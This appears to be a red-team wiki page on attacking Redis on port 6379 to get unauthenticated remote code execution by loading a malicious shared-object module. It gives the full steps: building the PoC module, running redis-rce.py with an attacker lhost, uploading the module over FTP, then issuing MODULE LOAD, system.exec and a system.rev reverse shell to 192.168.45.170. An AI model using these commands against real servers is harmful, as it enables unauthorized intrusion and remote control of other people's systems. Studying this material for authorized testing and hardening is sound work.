6379 - Redis

Redis is an open-source, in-memory key-value data store used for high-performance caching, message brokering, and real-time analytics. It supports a variety of data structures like strings, hashes, lists, sets, and sorted sets, and operates entirely in memory for speed, with optional persistence to disk. By default, Redis listens on TCP port 6379 and has no authentication or encryption unless explicitly configured, which often makes it a target during red team operations.

Unauthenticated Root RCE

Vulnerability Overview

In Redis 4.x and 5.x instances the ability to load shared object (.so) modules at runtime can leveraged to gain RCE. Exploitation requires two conditions to be met:

Privileged Access to Redis → The attacker must be able to issue privileged Redis commands such as MODULE LOAD. This is possible if the Redis instance is exposed to the internet without authentication or the attacker has acquired valid credentials to an authenticated instance. In addition, Redis must not restrict module loading; unless explicitly disabled, this capability is broadly accessible in insecure deployments.
Writable Location on Target Filesystem → The attacker must be able to place a malicious .so file on the target machine. Two main techniques can be used:
1. Abuse Redis’s persistence settings: using CONFIG SET dir and CONFIG SET dbfilename, combined with SAVE, an attacker can write arbitrary files to locations such as /tmp/.
2. Upload externally: if another service (e.g., FTP) exposes a writable path, the attacker can upload the .so file and instruct Redis to load it by its absolute path.

Once the malicious module is in place, Redis will load it and execute the attacker's code within the server's process space, effectively achieving RCE.

Exploitation

For either case, a .so file must be created. This can be done via the original PoC or its modified more modern version:

~$ git clone https://github.com/CSpanias/redis-module-rce && cd redis-module-rce && make
<SNIP>
gcc -Wall -fPIC -O2 -std=gnu99 -Imodule -shared -o module.so module/module.c

~/redis-module-rce$ ls -l module.so
-rwxr-xr-x 1 x7331 x7331 38704 Aug  1 14:29 module.so

~/redis-module-rce$ file module.so
module.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c35119dc82e22bb135fb85215b9c0f40c98edde4, not stripped

This PoC can be used to leverage the Redis settings:

./redis-rce.py --rhost redis-instance --lhost 192.168.45.170

If write access to the target host is already obtained, i.e., via FTP, the .so file can be uploaded and then loaded into Redis:

# Upload the .so file to the target host via FTP
$ ftp ftp@redis-target
ftp> cd pub
ftp> put module.so
ftp>exit

# Connect to the Redis instance
$ redis-cli -h redis-target
redis-target:6379> MODULE LOAD /var/ftp/pub/module.so # Load the module
OK

redis-target:6379> MODULE LIST # Confirm that the module is loaded
1) 1) "name"
   2) "system" # The function of interest
   3) "ver"
   4) (integer) 1

redis-target:6379> system.exec "id" # System command execution

redis-target:6379> system.rev 192.168.45.170 6379 # Reverse shell

Previous27017 - MongoDB NextSQL

Last updated 1 day ago

Was this helpful?